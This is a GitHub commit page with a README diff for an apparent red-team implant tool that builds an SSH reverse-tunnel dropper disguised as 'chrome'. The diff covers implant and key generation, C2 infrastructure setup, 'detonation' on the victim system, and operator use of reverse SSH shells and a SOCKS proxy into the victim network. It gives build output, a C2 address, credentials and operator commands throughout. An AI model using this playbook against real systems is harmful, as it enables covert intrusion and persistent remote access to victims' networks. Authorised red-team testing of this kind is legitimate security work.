Skip to content

Commit

Permalink
README
Browse files Browse the repository at this point in the history
  • Loading branch information
@dsnezhkov
dsnezhkov committed Apr 5, 2019
1 parent 22ca8a4 commit 5283aff
Showing 1 changed file with 167 additions and 33 deletions.
200 changes: 167 additions & 33 deletions README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -25,45 +25,179 @@ Note: No SCP yet. No DNS proxying yet.

## Deployment

Build Dropper
### Build Dropper and Create Keys

`./build.sh`
`$ ./tools/build.sh ./conf/build.profile `

```bash
[*] Building dropper
[*] Dropper Information (keep it safe):
#######################
Dropper File: rssh (7010788 bytes)
SSH serverHost=192.168.88.15
SSH serverPort=22
SSH serverUser=tester
SSH serverUserKeyUrl=http://127.0.0.1:9000/id_rsa_test_enc
SSH serverUserKeyPassphrase=password1
SSH-RT remoteCmdHost=127.0.0.1
SSH-RT remoteCmdPort=2022
SSH-RT remoteCmdUser=operator
SSH-RT remoteCmdPwd=6009c967f7176e5be0bb14d5b2beb0a8905a069f
SSH-RTS remoteSocksHost=127.0.0.1
SSH-RTS remoteSocksPort=1080
SSH-RT shell agent password: 6009c967f7176e5be0bb14d5b2beb0a8905a069f
#######################

Usage SSH-RT: ssh operator@127.0.0.1 -p 2022
Usage SSH-RTS: browser SOCKS proxy: 127.0.0.1:1080

```
1. Host dropper RSA keys on HTTP server (fetchable by URL from Company Intranet)
2. Allow SSH on C2
3. Ship the binary to victim
```
Cutting Implant ID 4fa48c653682c3b04add14f434a3114 for target (darwin/amd64)
### PHASE I: Implant Generation ###
------------------------------------
[*] Building Keys For 4fa48c653682c3b04add14f434a3114
[+] Generating PK
2019/04/05 00:32:51 Private Key generated
[+] Generating PUB from PK (SSH pub)
2019/04/05 00:32:51 Public key generated
[+] Encoding PK to PEM
[+] Writing PK to file: ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.pk
2019/04/05 00:32:51 Key saved to: ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.pk
[+] Writing PUB to file: ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.pub
2019/04/05 00:32:51 Key saved to: ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.pub
[+] Encrypting PK with passphrase (transmission/storage)
[+] Encoding PK B64 armored PK (transmission)
[+] Saving B64 armored PK to file: ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.bpk
2019/04/05 00:32:51 Key saved to: ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.bpk
[*] Building dropper 4fa48c653682c3b04add14f434a3114 (chrome) for darwin / amd64
**********************************************
Implant: chrome (6942380 bytes) Generated
!!! Here is the info on Implant configuraton !!!
!!! Record the info somewhere safe and we have saved a copy here !!!
!!! Implant Info: /Users/dimas/Code/go/src/sshpipe/out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.info !!!
!!! This info is mostly embedded in the Implant. !!!
!!! Again, save it, or you will need to regenerate the implant. !!!
**********************************************
```
The build process saves important information on agent properties and context into the file:

```
-------------- START INFO--------------
(Blue) Implant Egress HTTP Proxy Info
+HTTP Proxy:(from env?) yes
HTTP Proxy: http://167.99.88.24:8080
HTTP Proxy AuthUser companyuser
HTTP Proxy AuthPass <masked>
(Blue) Implant Execution Context
Daemonize? no
PIDFile: /tmp/chrome.pid
LogFile (!! Debug locally !!): /tmp/chrome.log
SSHEnvTerm xterm
SSHShell /bin/sh
(Yellow/Red) Implant HTTP/WS/WSS Wrap Endpoints
HTTP Endpoint: http://167.99.88.24:8082
WS Endpoint: wss://167.99.88.24:8082/stream
(Yellow/Red) SSH Rendezvous Point:
SSHServerHost=127.0.0.1
SSHServerPort=222
SSHServerUser=4fa48c653682c3b04add14f434a3114
(Yellow/Red) SSH Key Hosting / Embedding:
+SSHServerUserKeyFile=./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.bpk
SSHServerUserKeyUrl=http://127.0.0.1:9000/4fa48c653682c3b04add14f434a3114.bpk
SSHServerUserKeyPassphrase=7acf0d4ea272b24e095d5d74940a658
(Red) RT Operator Interface to SSH Implant Channel:
SSHRemoteCmdHost=127.0.0.1
SSHRemoteCmdPort=2022
(Red) RT Operator SSH Tunnel Usage and Authentication Info
SSHRemoteCmdUser=operator
SSHRemoteCmdPwd=f525a463a8a7fb3a5a11715bec926dd
(Red) RT Operator SOCKS Tunnel Usage Info:
SSHRemoteSocksHost=127.0.0.1
SSHRemoteSocksPort=1080
-------------- END INFO----------------
```

Build script packages key material for infra deployment:
```
[*] Packaging 4fa48c653682c3b04add14f434a3114 for infrastructure deployment
~/Code/go/src/sshpipe/out/4fa48c653682c3b04add14f434a3114 ~/Code/go/src/sshpipe
a ./4fa48c653682c3b04add14f434a3114.pk
a ./4fa48c653682c3b04add14f434a3114.bpk
a ./4fa48c653682c3b04add14f434a3114.pub
~/Code/go/src/sshpipe
```
_Based on your build profile you can expect the following Deployment Plan_

## Install

### Install implant support (manual)
```
### PHASE II: Red Infra Prep Deployment Guidance ###
----------------------------------------------------
A. If you have chosen to fetch armored SSH key from external Yellow/Red hosting, please host ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.bpk on your HTTP server. The key is encrypted, passworded and B64 protected. You can leave it on clear storage and use plaintext transmission. The implant will take care of the rest.
B.You will need to create user 4fa48c653682c3b04add14f434a3114 on SSH server where you want Implant to terminate the reverse tunnel on Red network. Refer to scripts in infra directory. SSH keys for the would be user are pregenerated: ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.pk and ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.pub. You need to place them in .ssh directory as per usual SSH access setup (mind the permissions on keys and .ssh directory)
C. You will need to stand up an WSS unwrap service on Yellow/Red side. Refer to scripts in infra directory or documentation.
```
### Install implant support (automation)

`./install_implant.sh /tmp/4fa48c653682c3b04add14f434a3114.tar.gz`

```
[+] Checking if 4fa48c653682c3b04add14f434a3114 OS account is available
[+] Creating 4fa48c653682c3b04add14f434a3114 OS account
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
[+] Setting up 4fa48c653682c3b04add14f434a3114 HOME
[+] Unpacking SSH Keys from 4fa48c653682c3b04add14f434a3114.tar.gz
./4fa48c653682c3b04add14f434a3114.pk
./4fa48c653682c3b04add14f434a3114.bpk
./4fa48c653682c3b04add14f434a3114.pub
[+] Setting 4fa48c653682c3b04add14f434a3114 SSH keys
[+] Adding PUBLIC Key /tmp//4fa48c653682c3b04add14f434a3114/.ssh/4fa48c653682c3b04add14f434a3114 to Agent's Authorized keys file
[+] Currently, content of 4fa48c653682c3b04add14f434a3114 's HOME:
drwx------ 3 4fa48c653682c3b04add14f434a3114 users 4096 Apr 5 05:52 /tmp//4fa48c653682c3b04add14f434a3114
drwx------ 2 4fa48c653682c3b04add14f434a3114 root 4096 Apr 5 05:52 /tmp//4fa48c653682c3b04add14f434a3114/.ssh
-rw------- 1 4fa48c653682c3b04add14f434a3114 staff 4364 Apr 5 04:42 /tmp//4fa48c653682c3b04add14f434a3114/.ssh/4fa48c653682c3b04add14f434a3114.bpk
-rw------- 1 4fa48c653682c3b04add14f434a3114 staff 3243 Apr 5 04:42 /tmp//4fa48c653682c3b04add14f434a3114/.ssh/4fa48c653682c3b04add14f434a3114.pk
-rw------- 1 4fa48c653682c3b04add14f434a3114 staff 725 Apr 5 04:42 /tmp//4fa48c653682c3b04add14f434a3114/.ssh/4fa48c653682c3b04add14f434a3114.pub
-rw-r--r-- 1 root root 725 Apr 5 05:52 /tmp//4fa48c653682c3b04add14f434a3114/.ssh/authorized_keys
/opt/sshorty/tools
[!!!] If not embedding PK into implant, host armored PK: /tmp//4fa48c653682c3b04add14f434a3114/.ssh/4fa48c653682c3b04add14f434a3114.bpk
```
## Detonation

```
### PHASE III: Blue Detonation and Connect back ###
---------------------------------------------------
0. Get the Implant on the Blue system detonate.
1. Implant 4fa48c653682c3b04add14f434a3114 connects to WS Endpoint wss://167.99.88.24:8082/stream
which unwraps to SSH tunnel 127.0.0.1:222 Red rendezvous
2. Implant authenticates to SSH rendezvous with RSA PK in ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.pk wrapped for transmission as ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.bpk as SSH/OS user 4fa48c653682c3b04add14f434a3114
3. Once authenticated the Implant opens up reverse SSH tunnel to Blue network and also stands up two ports on the Red side for convenience:
- SSH command port 2022
- SOCKS 1080 port used for proxying Red traffic over the channel to the implant to exit on Blue network
```
## Operation

```bash
SSH from Attacker C2: ssh operator@127.0.0.1 -p 2022

SOCKS from Attacker C2 SOCKS proxy: 127.0.0.1:1080
point your browser to it and/or proxifier. Note: no DNS masking yet.
```
### PHASE IV: RTO Guidance ###
-----------------------------------------------
RTOs can connect to the new implant channel by connecting to Red rendezvous ports exposed by the implant on Red network.
Examples:
For SSH interactive shell: ssh operator@127.0.0.1 -p 2022
For SSH batch exec: ssh operator@127.0.0.1 -p 2022 /path/command/on/blue
For SCP: scp -P 2022 /path/to/file/on/red operator@127.0.0.1:/path/to/file/on/blue"
Note: To use SOCKS in browser point browser to 127.0.0.1:1080 or for system wide coverage use proxychains with the same configuration
```

## C2:
Expand Down

0 comments on commit 5283aff

Please sign in to comment.